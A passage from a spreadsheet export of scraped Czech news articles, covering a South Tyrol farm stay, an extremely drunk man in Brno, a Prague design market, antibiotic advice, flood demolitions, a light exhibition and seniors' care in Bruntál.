„Chtěli jsme něco jiného, já jsem rebel,“ usměje se až ďábelsky žena, která sem přišla před 25 lety z Maďarska . Její manžel a dědic rodinné farmy Reinhard jen přikyvuje. Každý apartmán/pokoj má oblý tvar, který vytváří podivuhodnou náladu, kuchyňku, koupelnu a – výhled z kopců na Plose, Geisler nebo Schlern. „Použili jsme i dřevo z původní stodoly, máme topení v podlaze, ale ne pod postelí, mohou sem i vozíčkáři,“ ukazuje zajímavé detaily. Vedle zřídili ještě společenskou místnost, kde zachovali i původní mlýnek. „Jezdí k nám převážně lidé, kteří prchají před stresem a chtějí na pár dní vypnout, přeřadit na klidnější režim. Užívat si sebe, pomalejšího životaběhu, klidu přírody okolo.“ I na sjezdovky je odtud kus cesty. V létě dostavěli saunu, otevřeli i stánek pro výletníky. Ale pořád se věnují hlavně dvaceti kravám a patnácti telatům, chovaným na mléko. Můžete si tu zkusit třeba výrobu jogurtu.</t>
  </si>
  <si>
    <t>20241101_366_3242592586_ca35a705c756ef2bab04.html</t>
  </si>
  <si>
    <t>ca35a705c756ef2bab04</t>
  </si>
  <si>
    <t>Strážníkům v Brně nestačilo rozpětí alkoholtesteru. Opilec nadýchal příliš mnoho</t>
  </si>
  <si>
    <t>Strážníkům v Brně nestačilo rozpětí alkoholtesteru. Opilec nadýchal příliš mnoho Foto: ilustr foto, MP Kostelec nad Orlicí Jihomoravský kraj Do situace, se kterou se při své práci ještě nikdy nesetkali, přivedl ve čtvrtek v poledne dva brněnské strážníky čtyřiapadesátiletý muž. Přijeli ho zkontrolovat do tramvajové smyčky v Řečkovicích po telefonátu řidičky dopravního podniku. S pomocí cestujícího prý muže odtáhla z blízkosti kolejí, u kterých ležel silně podroušený alkoholem . Měla ale obavy, aby se nevrátil zpátky k trati a neohrozil tak svůj život. Moment překvapení pro hlídku nastal, když stále ještě polehávajícího muže pobídla k podstoupení dechové zkoušky. Přístroj totiž po prvním pokusu ukázal, že příliš vysokou hodnotu ani nedokáže změřit. Technické maximum tohoto konkrétního zařízení se přitom pohybuje kolem šesti promile. Strážníci proto muži zavolali záchrannou službu a s drobným časovým odstupem nechali dotyčného znovu dýchnout do alkohol testeru. Zobrazil extrémní hodnotu 5,38 promile, která pro nenavyklého člověka může být i smrtelná. Zdravotníci si muže převzali do své péče a po ošetření ho odvezli do nemocnice. Navíc je podezřelý z porušení takzvaného tabákového zákona, protože se v tomto stavu zdržoval na nástupišti hromadné dopravy. Ve správním řízení mu hrozí pokuta do dvaceti tisíc korun. Mgr. Jakub Ghanem MP Brno Autor: Pavel Jaňurek Autor person Pavel Jaňurek Rubrika transition_slide Události</t>
  </si>
  <si>
    <t>20241101_367_3242768351_7e4c4bd40c1d1e6a7dad.html</t>
  </si>
  <si>
    <t>7e4c4bd40c1d1e6a7dad</t>
  </si>
  <si>
    <t>LEMARKET 2024</t>
  </si>
  <si>
    <t>LEMARKET 2024 07.12.2024 - 08.12.2024 Praha Jedenáctý LEMARKET přivítá 200 značek a umělců v budově bývalých elektrických podniků WPP Campus. Uskuteční se během dvou prosincových víkendů. Moderní tržiště LEMARKET, které představuje a podporuje českou tvorbu, vstoupilo do druhé dekády. V letošním roce zaplní o dvou víkendech 7. a 8. prosince a 14. a 15. prosince rekonstruovanou budovu WPP Campus u stanice metra Vltavská, do které se běžně veřejnost nedostane. V budově, která v roce 2021 získala ocenění Stavba roku, najdou návštěvníci nejen více než 200 lokálních značek, designérů a umělců, ale i prostor pro odpočinek a relaxaci. Součástí obou víkendů bude vedle gastro zóny a bohatého doprovodného programu i možnost profesionálního líčení, tetování a workshopy. LEMARKET pokračuje ve své misi objevovat a představovat to nejlepší z lokální tvorby. Každý ze dvou víkendů nabídne přes 100 pečlivě vybraných značek, přičemž pouze 30 z nich se bude oba termíny opakovat. " Návštěvníci tak budou mít jedinečnou příležitost objevit během obou víkendů zcela nové tvůrce a značky jako jsou například Ententyky, Soolista, Nikola Zezulová, Michaela Lada, Artistka nebo Kayu. Zároveň jsme program obohatili o řadu služeb, které zpříjemní celkový zážitek z návštěvy. Ať už jde o tetovací salón nebo péče o krk, ruce a obličej se značkou Bioorganica," říká organizátorka Elena Janota . Oceněné prostory WPP Campus, dříve Orco Bubenská, jsou důvěrně známé tvůrčí komunitě. Mnoho značek zde v minulosti mělo své ateliéry a showroomy a LEMARKET sám v ní po několik let sídlil. Budova se s LEMARKETEM promění v designové tržiště s originální atmosférou. Citlivá rekonstrukce budovy zachovala řadu původních architektonických prvků, které vytváří jedinečné prostředí pro prezentaci současného designu. Mezi vystavovateli nebudou chybět etablované české značky jako je například udržitelná oděvní značka Weconcept, výrobci českých parfémů a vůní do interiérů Perfumed Prague a Oraculum a designéři a designérky jako jsou šperkařka Eliška Lhotská a Ela Chroust, výrobci kožených doplňků about leather nebo brýlařské studio Optiqua. Nejen ty doplní začínající tvůrci a přibližně desetina vystavovatelů přijede ze Slovenska . Novinkou letošního ročníku je rozšířená nabídka služeb pro návštěvníky. V prostorách marketu naleznou tetovací salon, relaxační zónu s masážemi od Biorganica zaměřenými na péči o krk, ruce a obličej, služby vizážistky s možností líčení a poradenství, a profesionální balení dárků. Významnou součástí je také nová dobročinná zóna, kde se zdarma představí charitativní projekty SPOLUŽIVOT, METRÁŽ a ELPIDA. O gastronomické zážitky se postará kurátorovaný výběr značek. Návštěvníci ochutnají vína od ALMA WINES, pečivo z pekárny La Forme, speciality od Sweet &amp;amp; Pepper Days, kávu od Onesip Coffee a Dvakratdva, japonské speciality Neko Onigirazu, sladkosti z pardubické cukrárny Epifany a osvěžující nápoje od Herbert Sirupy. Kulturní program, který bude moderovat Šimon Bilina , nabídne pestrý mix žánrů. Na pódiu se vystřídají Adam Vopička, Sbor ELPIDA, dětský sbor HLÁSKY a večerní atmosféru dokreslí DJ set. V programu bude také benefiční divadelní představení, kterým budou moc lidé podpořit vybraný charitativní projekt. LEMARKET se uskuteční během dvou prosincových víkendů (7. – 8. 12. a 14. – 15. 12.) v prostorách WPP Campus . Vstupné činí 150 Kč na den nebo 250 Kč na celý víkend. Děti do 15 let a senioři mají vstup zdarma. « zpět na seznam položek Autor: Atlas Česka, s.r.o. Rubrika transition_slide Kalendář akcí</t>
  </si>
  <si>
    <t>20241101_368_3242789220_d5e3512c8ede33af7c24.html</t>
  </si>
  <si>
    <t>d5e3512c8ede33af7c24</t>
  </si>
  <si>
    <t>Pravidla užívání antibiotik: Nikdy je nezapíjejte grapefruitovou šťávou</t>
  </si>
  <si>
    <t>Pravidla užívání antibiotik: Nikdy je nezapíjejte grapefruitovou šťávou close stevepb / Pixabay Renata Bachtíková 1. 11. 2024 clock 3 minuty Antibiotika představují vhodnou léčbu některých infekcí bakteriálního charakteru. Jejich úkolem je zabíjet škodlivé bakterie nebo bránit jejich rozšiřování. Různé formy antibiotik Antibiotika existují v různých formách: tablety, kapsle nebo tekutina – používají se pro léčbu větších typů mírných nebo středně těžkých infekcí krémy, spreje nebo kapky – tyto druhy jsou nejčastěji určené pro léčbu kožní infekcí či infekcí očních nebo nosních injekce – využívají se u závažnějších typů infekcí, aplikují se přímo do krve nebo do svalu Jak správně užívat antibiotika? Antibiotika je potřeba užívat dle doporučení lékaře, který je předepsal. Užitečným pomocníkem je také příbalový leták, který obsahuje, kromě jiného, také informaci, jak konkrétní antibiotika užívat, aby plnila svůj účel. Vždy je potřeba dobrat celou předepsanou dávku a tu brát denně tak, jak určí lékař. Je důležité dokončit celou léčbu, i když se třeba začnete cítit lépe dříve. Pokud nedoberete celou dávku, škodlivé bakterie mohou přežít, onemocnění se vám může vrátit a jeho léčba se pak může stát obtížnější. Antibiotika je nutno užívat každý den ve stejný čas. Jestliže si dávku zapomenete vzít, další nezdvojnásobujte. S čím antibiotika užívat? Nejčastěji je to voda. Nápoje jako ovocné šťávy, mléko nebo dokonce alkohol , mohou ovlivnit jejich vstřebávání. Účinek antibiotik může snížit také grapefruitová šťáva. Pozor dejte i na užívání některých léků, se kterými mohou antibiotika interagovat. Lékař by měl vědět o všech lécích, které momentálně užíváte. Co nedělat při užívání antibiotik? Pokud lékař předepíše menší množství tablet, než má balení, zbylé tablety neuchovávejte k pozdějšímu užívání. Také je nikomu jinému k užívání nedávejte. Nevyhazujte je do odpadkového koše nebo do toalety, ale odevzdejte je v lékárně. Při užívání antibiotik se nevystavujte slunečnímu záření. Mají totiž potenciál zvyšovat citlivost těla na sluneční paprsky, proto je vhodné omezit pohyb venku. Kdy neužívat antibiotika? Pokud máte běžnou rýmu, kašel, střevní nebo klasickou chřipku. Tyto obtíže jsou způsobené viry, proti kterým antibiotika nefungují. Jak je to s alkoholem ? Tomu byste se měli vyhýbat, neboť některé druhy antibiotik s ním interagují. Kromě toho může alkohol snižovat jejich účinek a zvýšit riziko účinků nežádoucích. Posílení imunity po antibiotikách Během léčby antibiotik, ale i po ní užívejte probiotika. Během užívání antibiotik může docházet ke změně střevního mikrobiomu. Vzhledem k tomu, že probiotika jsou také bakterie, mohou být zlikvidována antibiotiky. Je tedy důležité je zase tělu dodat. Užívejte je s odstupem několik hodin od antibiotik. Vhodné je také do jídelníčku zařadit potraviny, které jsou bohaté na vlákninu, která stimuluje růst střevních bakterií. Mezi potraviny bohaté na vlákninu patří celá zrna, ořechy, semínka, luštěniny, bobule, brokolice. Vhodnou volbou jsou také potraviny fermentované. I ty pomáhají s obnovou střevního mikrobiomu. Tyto potraviny obsahují několik druhů zdravých bakterií. Zdroje: Facebook X.com Threads Email Kopírovat Zavřít user Sledujte nás v Google Zprávách Newsletter Odesláním souhlasím se Všeobecnými smluvními podmínkami a beru na vědomí Zásady zpracování osobních údajů spol. VLTAVA LABE MEDIA a.s. Doporučené články facebook instagram youtube Newsletter Odesláním souhlasím se Všeobecnými smluvními podmínkami a beru na vědomí Zásady zpracování osobních údajů spol. VLTAVA LABE MEDIA a.s. vlm Copyright © VLTAVA LABE MEDIA a.s. všechna práva vyhrazena Publikování, šíření nebo jakékoliv jiné užití obsahu pro jiné než osobní účely uživatele, je bez písemného souhlasu VLTAVA LABE MEDIA a.s. zakázáno. Toto ustanovení platí také pro RSS kanály a jejich obsah. Přihlášení Rádi bychom znali důvod proč se nechcete přihlásit. Odběr newsletteru Chcete pravidelně dostávat výběr nejlepších článků na Váš e-mail? Odesláním souhlasím se Všeobecnými smluvními podmínkami a beru na vědomí Zásady zpracování osobních údajů spol. VLTAVA LABE MEDIA a.s. Skutečně se chcete odhlásit?</t>
  </si>
  <si>
    <t>29350</t>
  </si>
  <si>
    <t>111940</t>
  </si>
  <si>
    <t>20241101_369_3242716891_97138fe98e4aa16ec63c.html</t>
  </si>
  <si>
    <t>97138fe98e4aa16ec63c</t>
  </si>
  <si>
    <t>Svalnatý anděl s tváří modelky: Jak Kristina Mendoza okouzlila svět fitness</t>
  </si>
  <si>
    <t>Svalnatý anděl s tváří modelky: Jak Kristina Mendoza okouzlila svět fitness Kristina Mendoza vyniká nejen svým vzhledem, který připomíná vévodkyni Meghan Markle, ale především vytrvalostí a silou. Díky pečlivé disciplíně a vášní pro fitness si vybudovala postavu, která kombinuje sílu i krásu najednou. Od sportu k záři reflektorů Energická Američanka okouzluje svou jedinečnou kombinací síly a elegance. Díky svalnaté postavě, kterou mnozí fanoušci přirovnávají k vévodkyni ze Sussexu , se stala fenoménem na fitness scéně. Ačkoli na první pohled vypadá jako modelka, Kristina se cítí jako kulturistka – a v tom se skrývá její kouzlo. Od dětství inklinovala k pohybu, začala s atletikou a postupně přešla k tanci. Po čase však pocítila touhu po změně. Chtěla posílit nejen své tělo, ale i sebevědomí. A tak začala její vášeň pro posilování, která ji zavedla až na prkna kulturistických soutěží. Posilovna jako nový domov Když Kristina poprvé vstoupila do posilovny, okamžitě se zamilovala do světa závaží a svalové síly. Posilování ji zcela pohltilo, a to natolik, že začala studovat každý aspekt zdravého životního stylu. Vzdala se alkoholu a nezdravého jídla, její strava nyní sestává především z bílkovin a čerstvé zeleniny. Posilovna se pro ni stala místem, kde nacházela nejen fyzickou sílu, ale i klid. Díky svému odhodlání dosáhla certifikace NFPT, což jí otevřelo dveře k vlastnímu podnikání. Začala se věnovat trénování ostatních a pomáhala jim dosáhnout lepší kondice. Svou vášeň pro fitness tak proměnila v povolání, které ji naplňuje každý den. Inspirace pro tisíce fanoušků Kristina si postupně vybudovala početnou komunitu na internetu, kde se stala inspirací pro lidi všech věkových kategorií. Fanouškům ukazuje, jak cvičit, jíst zdravě a zůstat motivovaní. Na sociálních sítích často sdílí motivační příspěvky a fotografiemi dokumentuje svůj vlastní pokrok. „Nevzdávejte se nikdy toho, co milujete,“ hlásá žena s každým svalem vytesaným na těle. Její transformace je fascinující – roky tvrdé dřiny ji zformovaly v ženu, která je silná a zároveň vyzařuje ženskost. S oblibou obléká přiléhavé oblečení, které podtrhuje její vypracovanou postavu, a zároveň v ní probouzí vnitřní modelku. Vítězství a vstup mezi profesionály Díky podpoře fanoušků se odhodlala k dalšímu kroku – zúčastnila se své první profesionální kulturistické soutěže. Tento milník pro ni znamenal obrovskou výzvu, ale také příležitost ukázat, čeho je schopná. Roku 2019 si z IFBB Chicago Pro odnesla první místo a získala místo v elitní společnosti profesionálů. Organizátoři si cení nejen její působivé postavy, ale také jedinečné ženskosti, kterou do světa kulturistiky vnáší. Kristina se tak stala známou jako Kulturistický anděl, což ji dokonale vystihuje. Tato výjimečná přezdívka odráží jak její sílu, tak krásu, které tvoří unikátní kombinaci inspirující tisíce lidí po celém světě. Příspěvek sdílený (@krristinanicole) Autor: František Novák Autor person František Novák</t>
  </si>
  <si>
    <t>78140</t>
  </si>
  <si>
    <t>35210</t>
  </si>
  <si>
    <t>20241101_37_3251453851_9a1f60ef164f570b59cf.html</t>
  </si>
  <si>
    <t>9a1f60ef164f570b59cf</t>
  </si>
  <si>
    <t>Pomoc po povodních</t>
  </si>
  <si>
    <t>Pomoc po povodních Kristýna KLOUBKOVÁ, moderátorka: Demolice budov, které v září zničily povodně, stále pokračují. Jen Moravskoslezském kraji se jedná o více než 70 staveb a polovina z nich jsou rodinné domy. 20 objektů už bylo zbouráno. Martin POUVA , moderátor: A bourá se i v sousedním Olomouckém kraji. Tam šlo k zemi už přes 30 objektů. Jiří LOUČKA, reportér: Rodinný dům Romany Hermové stál kvůli protržené hrázi v Ostrově-Nové Vsi 10 dnů ve vodě. Když voda opadla, statik rozhodl o demolici. Paní Hrabová se proto se svými třemi adoptovanými dcerami naposledy podívala do domu, kde bydlely. Romana HERMOVÁ, majitelka domu: Tady byl o piva krásný. Tady byla krásná kuchyň, kde se mi dobře vařilo. Bylo to hezké. Dneska to všechno už nemáme. Adéla LASZTŮVKOVÁ, adoptovaná dcera: Toto byl náš povodním pokoj, kde jsme byly s holkami. Nela BALOGOVÁ, adoptovaná dcera: Spolu zvládáme i tyto těžké chvíle, které nás potkaly. Jiří LOUČKA, reportér: Demoliční firma dům nejprve vyklidila a pak jej začala bourat. Romana HERMOVÁ, majitelka domu: Patnáct let jsme tu energii do toho dali. Martin ŠLOSÁREK, stavbyvedoucí: Demolice trvá pět dnů z důvodu toho, že se musí recyklovat tyto odpady. Jiří LOUČKA, reportér: K zemi půjde například i tento dům v Ostravě -Nové Vsi. Demoliční firma už začala vyklízet. Stavbyvedoucí: My to bouráme celé od základu a hold si postavíme barák. Jiří LOUČKA, reportér: Jen v Moravskoslezském kraji čeká na demolici přes 70 budov. Nikola BIRKLENOVÁ, mluvčí Moravskoslezského kraje : Krajský úřad Moravskoslezského kraje hradí i statiky a ty nařízené demolice. Jiří LOUČKA, reportér: Obyvatelé povodněmi zničených domů zatím bydlí většinou v městských bytech. Třeba paní Hermová má ale smlouvu jen do začátku ledna. Romana HERMOVÁ, majitelka domu: Nejhorší je, že nevím vůbec, co dál bude, co jak. Tomáš LEFNER (nestr.), starosta Ostravy Nové Vsi: Jsou nějaké smlouvy na dobu určitou, ale už jsme jednali se starostou o tom, že by se to prodlužovalo do té doby, než si jako opraví ty svoje nemovitosti. Jiří LOUČKA, reportér: Zřejmě už příští týden ministerstvo práce a sociálních věcí zveřejní, jakým způsobem pomůže povodněmi postiženým lidem. V polovině listopadu totiž v moravskoslezském a olomouckém kraji skončí stav nebezpečí. Kraje pak už nebudou obcím proplácet demolice nebo ubytování.</t>
  </si>
  <si>
    <t>1340000</t>
  </si>
  <si>
    <t>20241101_370_3242538275_e82e39c5de0c4e1455b8.html</t>
  </si>
  <si>
    <t>e82e39c5de0c4e1455b8</t>
  </si>
  <si>
    <t>Třetí ročník projektu „Světla vyprávějí…“ přináší fascinující vesmírný zážitek do Žlutých lázní Praha , 1. listopadu 2024 Více než stovka světelných soch a objektů tvořená čtyřmi sty tisíci světly ponese v letošní podzimní a zimní sezóně název „Zvonkova cesta vesmírem.“ Světelný park „Světla vyprávějí…“ se již potřetí vrací do Žlutých lázní v Praze . Přináší ohromující podívanou inspirovanou příběhem pohádkové postavy Zvonka. Tento kouzelný průvodce Zvonek vezme malé i velké návštěvníky na nezapomenutelnou cestu tajemstvími vesmíru. Unikátní výstava bude otevřena od 1. listopadu 2024 do 31. ledna 2025 každý den po setmění. „Zvonkova cesta vesmírem“ zahrnuje planety, hvězdy, Slunce, kosmické lodě i astronauty a nabízí jak úchvatnou světelnou podívanou, tak i vzdělávací interaktivní prvky. Návštěvníci se prostřednictvím moderních technologií a animací seznámí s nejnovějšími vědeckými poznatky o vesmíru, které jsou zpracovány zábavnou a hravou formou, což zejména děti vtáhne do dobrodružství plného objevů. Spojení Vánoc s vesmírem Výstava propojuje vánoční atmosféru s kosmickými motivy. Betlémskou hvězdu zde symbolizuje kometa, která provází návštěvníky na cestě nekonečným prostorem, a na návštěvníky čeká také unikátní vesmírný strom splněných přání. Tento prvek propojuje tradiční vánoční symboliku s inovativními světelnými instalacemi. Ruční tvorba světelných soch: Umění, design a jedinečnost v každém detailu Světelné expozice „Světla vyprávějí…“ jsou zcela unikátní zejména tím, že jejich téma a zpracování respektují a doplňují místo, ve kterém jsou instalovány. Všechny světelné sochy a objekty jsou ručně vyráběny v české rodinné firmě Decoled pod vedením majitelky Evy Poláčkové. Tým zkušených designérů a řemeslníků společně pracuje na tom, aby každé dílo mělo svou jedinečnou tvář. Kreativní nápady jsou pečlivě zpracovávány po celý rok, aby se v zimních měsících mohly proměnit v ohromující světelné instalace. Každý vystavený kus je originální a nese rukopis talentovaných řemeslníků, kteří vdechují těmto dílům život. Ekologický přístup a interaktivní zážitky Celá výstava je navržena s důrazem na udržitelnost. LED diody a další světelné prvky jsou energeticky úsporné, a mnohé dekorace jsou vyrobeny z recyklovatelných plastů pomocí nejmodernějšího velkoplošného 3D tisku. Interaktivní prvky umožní návštěvníkům hravou formou objevovat vesmírná tajemství a díky environmentálnímu přístupu má expozice minimální dopad na životní prostředí. Odborná spolupráce „Zvonkova cesta vesmírem“ vznikla ve spolupráci s astronomy z Hvězdárny Žebrák a dalšími odbornými institucemi, což zajišťuje autenticitu a vzdělávací hodnotu expozice. Návštěvníci se mohou těšit nejen na vizuální zážitek, ale i na poutavé informace o vesmíru. Výjimečné místo pro sváteční setkávání Světelné parky „Světla vyprávějí…“ nejsou jen vizuální podívanou, ale především místem, kde se lidé setkávají a společně sdílejí kouzelnou atmosféru svátků. „Naším přáním je nejen rozzářit veřejný prostor, ale také vnést světlo a inspiraci do života lidí. Chceme, aby každá expozice vkusně a citlivě kultivovala okolí a zároveň respektovala tradice a ducha místa, kam je zasazena. Letos budou naše světelné parky na patnácti místech po celé Evropě a těší nás, že mohou přinést radost všem,“ říká Eva Poláčková, majitelka společnosti Decoled . Zveme vás k jedinečnému zážitku Světelná expozice ve Žlutých lázních je příležitostí strávit volný čas netradičně a objevovat ztvárněné krásy vesmíru v klidném prostředí přímo u Vltavy . Výstava je otevřena denně od 1. listopadu 2024 do 31. ledna 2025. „Výstava nabízí možnost krásné zimní procházky na břehu Vltavy v areálu, který je jinak v tomto období zavřený. Zveme všechny, aby si přišli užít spojení s přírodou u zimní řeky, spolu s prohlídkou originálních instalací a vychutnali si třeba rodinný podvečer s vesmírnou atmosférou se sklenicí svařeného vína nebo horké čokolády,“ zve Jan Dell , ředitel areálu Žluté lázně v pražském Podolí . Přijďte se ponořit do fascinujícího světa světla a objevte, jak neuvěřitelně krásný je nekonečný vesmír kolem nás! Foto: Decoled Místo konání: Otevírací doba: Areál Žluté lázně Denně (po-ne) 16-21 hodin Podolské nábřeží 3/1184 140 00 Praha Více informací na: https://svetlavypraveji.cz/praha Světelnou expozici Světla vyprávějí… připravila česká rodinná společnost DECOLED . Již více než čtvrt století zdobí světly města a obce v Česku i zahraničí. Tvoří tematické světelné dekorace obchodních center, vánočních trhů a světelných parků. Vyrábí a prodává vánoční světla a dekorace. Prostě žije Vánoci po celý rok, a to už 27 let. Zdroj: Komunikační agentura Seteva Dana Samková Autor: Svetozár Plesník Autor person Svetozár Plesník Rubrika transition_slide Zábava</t>
  </si>
  <si>
    <t>20241101_371_3242518521_eb92e5c0498016d47939.html</t>
  </si>
  <si>
    <t>eb92e5c0498016d47939</t>
  </si>
  <si>
    <t>Muž v Brně byl tak opilý, že mu nestačilo rozpětí alkohol testeru. Maximum je šest promile</t>
  </si>
  <si>
    <t>Muž v Brně byl tak opilý, že mu nestačilo rozpětí alkohol testeru. Maximum je šest promile Do velmi kuriózní situace se dostali brněnští strážníci, kteří vyjeli zkontrolovat zdravotní stav čtyřiapadesátiletého muže k tramvajové smyčce v Řečkovicích . Opilý svým dechem zaskočil nejen strážníky, ale i samotný alkohol tester. Rozpětí přístroje na něj totiž bylo krátké. Technické maximum zařízení strážníků se přitom pohybuje kolem šesti promile. Strážníci vyrazili ve čtvrtek v poledne k tramvajové smyčce v Řečkovicích , kam je zavolala řidička dopravního podniku, a to kvůli silně opilému muži, kterého musela s pomocí jednoho z cestujících odtáhnout z blízkosti kolejí, kde muž ležel v alkoholovém opojení. Vzhledem k tomu, že řidička měla obavy, aby se nevrátil zpátky k trati a neohrozil tak svůj život, zavolala strážníky. „Moment překvapení pro hlídku nastal, když stále ještě polehávajícího muže pobídla k podstoupení dechové zkoušky. Přístroj totiž po prvním pokusu ukázal, že příliš vysokou hodnotu ani nedokáže změřit. Technické maximum tohoto konkrétního zařízení se přitom pohybuje kolem šesti promile. Strážníci proto muži zavolali záchrannou službu a s drobným časovým odstupem nechali dotyčného znovu dýchnout do alkohol testeru,“ popsal mluvčí brněnských strážníků Jakub Ghanem . Přístroj po krátké pauze zobrazil extrémní hodnotu 5,38 promile. Ta může být pro člověka, který není zvyklý na konzumaci alkoholu , i smrtelná. „Zdravotníci si muže převzali do své péče a po ošetření ho odvezli do nemocnice. Navíc je podezřelý z porušení takzvaného tabákového zákona, protože se v tomto stavu zdržoval na nástupišti hromadné dopravy. Ve správním řízení mu hrozí pokuta do dvaceti tisíc korun,“ uzavřel mluvčí. Autor: Ivo Špisar Autor Ivo Špisar</t>
  </si>
  <si>
    <t>20241101_372_3242501912_cbb06c6607c835c40c1e.html</t>
  </si>
  <si>
    <t>cbb06c6607c835c40c1e</t>
  </si>
  <si>
    <t>Jablonečtí strážníci a případy ovlivněné alkoholem</t>
  </si>
  <si>
    <t>Jablonečtí strážníci a případy ovlivněné alkoholem Jablonečtí strážníci mají problémy s alkoholem . Samozřejmě ne vlastní. Museli řešit přestupky několika jabloneckých občanů, kteří své problémy s alkoholem nezvládli a tím se stali problémem policie. Autor: Miroslav Holubec Autor person Miroslav Holubec Rubrika transition_slide Krimipříběhy</t>
  </si>
  <si>
    <t>3050</t>
  </si>
  <si>
    <t>20241101_373_3242508637_5e81542a3d62ab9c57a2.html</t>
  </si>
  <si>
    <t>5e81542a3d62ab9c57a2</t>
  </si>
  <si>
    <t>Než si pro nás přijde: Bruntálští senioři na cestě k důstojnému a kvalitnímu stáří</t>
  </si>
  <si>
    <t>Než si pro nás přijde: Bruntálští senioři na cestě k důstojnému a kvalitnímu stáří Nedostatek zdravotnické péče a omezené sociální služby představují pro Moravskoslezský kraj výzvu související se stárnutím populace. Jak se žije seniorům v Bruntále , centru okresu s nejstarší populací v kraji? Jakým překážkám čelí a jaké mají potřeby? — 14 min read Senioři v centru Pohoda, foto: Jan Žabka V horkém letním dni lidé nakupují u stánku s květinami, vedle se na zákazníky usmívají prodejkyně jahod. Na zahrádkách kaváren mezitím mizí dopité šálky kávy. A opodál, na rohu bruntálského náměstí Míru, stojí u jednoho z domů skupina seniorů. V tichosti si ve výloze prohlíží několik úmrtních oznámení. Scéna na náměstí je vstupní branou do hlubšího příběhu, který se pravidelně odehrává v celém Moravskoslezském kraji, nejen v Bruntále . Stárnutí je zásadní celospolečenské téma, a to kvůli zvyšujícímu se počtu starších obyvatel a změnám, které to pro místní společnost přináší. Bruntál na mapě stárnutí a péče Podobně jako mnoho míst po celém světě, i Moravskoslezský kraj stárne. Průměrný věk jeho obyvatel, nyní na 43,5 letech, je podle dat Českého statistického úřadu z roku 2023 jedním z nejvyšších v zemi. Za posledních třicet let se tento průměr zvýšil o téměř osm let. Změny v demografii jsou zřetelné: zatímco počet obyvatel ve věku do 15 let klesl o téměř 84 tisíc, počet seniorů nad 65 let vzrostl o více než 108 tisíc. Stárnutí populace vede k řadě výzev, které definuje například Strategický rámec přípravy na stárnutí společnosti 2021 - 2025 od ministerstva práce a sociálních věcí: „Demografický vývoj vyžaduje daleko širší změny v oblasti příjmů státního rozpočtu, státní správy, stabilně dostupného bydlení, financování a kvality a místní a časové dostupnosti sociální a zdravotní péče, celoživotního vzdělávání, zaměstnanosti, ocenění a odměňování práce v sociálních službách, ochrany práv seniorů či fungování veřejného prostoru.“ Nejvyšší průměrný věk v Moravskoslezském kraji je právě v okrese Bruntál . Samotné město je lehce nad krajským průměrem, je však také centrem, do kterého se sjíždí senioři z okolních obcí za zdravotními a sociálními službami, ale též socializací. Z rozhovorů s místními seniory a zástupci seniorských spolků a organizací v Bruntále vyplývá, že největším problémům čelí tito lidé právě v oblasti zdravotnické a sociální péče a důstojného stáří. Seriál o mikroregionech Seriál o mikroregionech představuje tři oblasti Moravskoslezského kraje označované za vnitřní periferie. Charakterizuje je nejen kumulace sociálních znevýhodnění, ale také strukturální a demografické změny, které ztěžují jejich rozvoj. Studie ukazují, že tyto oblasti často trpí dlouhodobým úbytkem obyvatelstva, což dále zhoršuje služby a infrastrukturu, ať už jde o dostupnost škol, zdravotní péče či pokrytí veřejnou dopravou. Vnitřní periferie bývají také spojeny s nižší ekonomickou diverzifikací, což znamená, že jsou závislé na několika málo odvětvích, která jsou často zranitelná vůči vnějším ekonomickým vlivům. Tento problém ještě umocňují takzvané „ pasti chudoby “, kdy nedostatek pracovních příležitostí, slabá infrastruktura a omezený přístup ke kvalitnímu vzdělání vedou k prohlubování chudoby. Celý komplex problémů vytváří z vnitřních periferií oblasti, které jsou nejen ekonomicky, ale i sociálně a demograficky znevýhodněné. Právě na tyto regiony je podle odborníků potřeba se zaměřovat v rámci rozvojové a sociální politiky. Život na okraji Šedesáti osmi letá Světlana jde se svou čerstvě osmdesáti čtyř letou maminkou Evou, která je na vozíčku, přes náměstí v Bruntále . Jsou na pravidelné procházce po městě a směřují k místnímu zámku. Chtějí navštívit jeho zahrady. Vyrazily z nedalekého domova s pečovatelskou službou, kde paní Eva bydlí už rok v jednopokojovém bytě. V Bruntále žije celkem osm let. Nové bydlení jí dcera zařídila poté, co jí zemřel partner a zhoršil se její zdravotní stav. Do domova seniorů nechce, protože by tam neměla soukromí, a zároveň to nevyžaduje její zdravotní stav. „Po bytě se dokáže pohybovat a základní věci k životu zvládne sama. Do domova pro seniory by šla v případě, že by se její stav výrazně zhoršil,“ říká Světlana. Paní Eva si na život v novém nestěžuje. Chybí ji ale setkávání s jinými lidmi. Mají s dcerou dobrý vztah a vídají se téměř každý den, možnost kontaktu s někým dalším by jí však pomohla lépe zvládat pocity samoty. Ráda by si s někým pravidelně povídala a třeba si i postěžovala. Na nedostatek sociálního vyžití totiž není paní Eva zvyklá. Před nastěhováním do Bruntálu žila v nedalekých Miloticích , kde se pravidelně ještě se svým partnerem účastnila setkání seniorů a akcí v místním kulturním domě. V Bruntále pak před nastěhováním do domu s pečovatelskou službou aspoň potkávala více lidí, se kterými si povídala. „Teď je to těžké,“ říká. „Není tam žádná společenská místnost, kde by se potkala s dalšími obyvateli domu. Ten zároveň není plně bezbariérový. Je tam sice jen jeden zdánlivě malý schůdek, ale pro ty lidi to znamená obrovský schod,“ doplňuje paní Světlana. „S kamarádkami tak může mluvit maximálně přes telefon,“ říká s tím, že je její maminka „odsunutá na okraj“. Paní Světlana a paní Eva v Bruntále , foto: Jan Žabka „Už to nějak vydržím.“ Samota ale není jediná komplikace, které paní Eva čelí. Trpí též šedým zákalem a zhoršuje se jí zrak. Dcera Světlana se pro ní snažila sehnat očního lékaře, ale všude jí řekli, že pro ní nemají volné místo. Chtěla mamince vyřídit operaci očí. „Aby si mohla normálně počíst nebo koukat na televizi,“ vysvětluje. Operaci jí ale údajně nechtějí nikde udělat, protože nemá doporučení od očního. „Obvodní lékař to udělat nemůže a na oční jí nikde nevezmou. Volala jsem do Opavy , Krnova , Rýmařova , všude,“ pokračuje. Paní Eva na řešení své zdravotní situace už v podstatě rezignovala. „Já už to nějak vydržím,“ říká. Její dcera ale nesouhlasně kroutí hlavou: „Přeci to nemá být o tom něco vydržet. Nemá plnohodnotný život.“ Nedostatek specialistů je v Moravskoslezském kraji reálný problém, nejen mimo větší města. Kromě zmíněných oftalmologů jde o stomatology, pediatry nebo například internisty. Pacienti často musí za péčí do vzdálených měst, jako je Ostrava , Opava nebo Olomouc . Podle náměstka hejtmana pro zdravotnictví Martina Gebauera (ANO) to kraj řeší podobným způsobem jako nedostatek všeobecných lékařů: „Spolupracujeme s vysokými školami, podporujeme vznik specializovaných ordinací 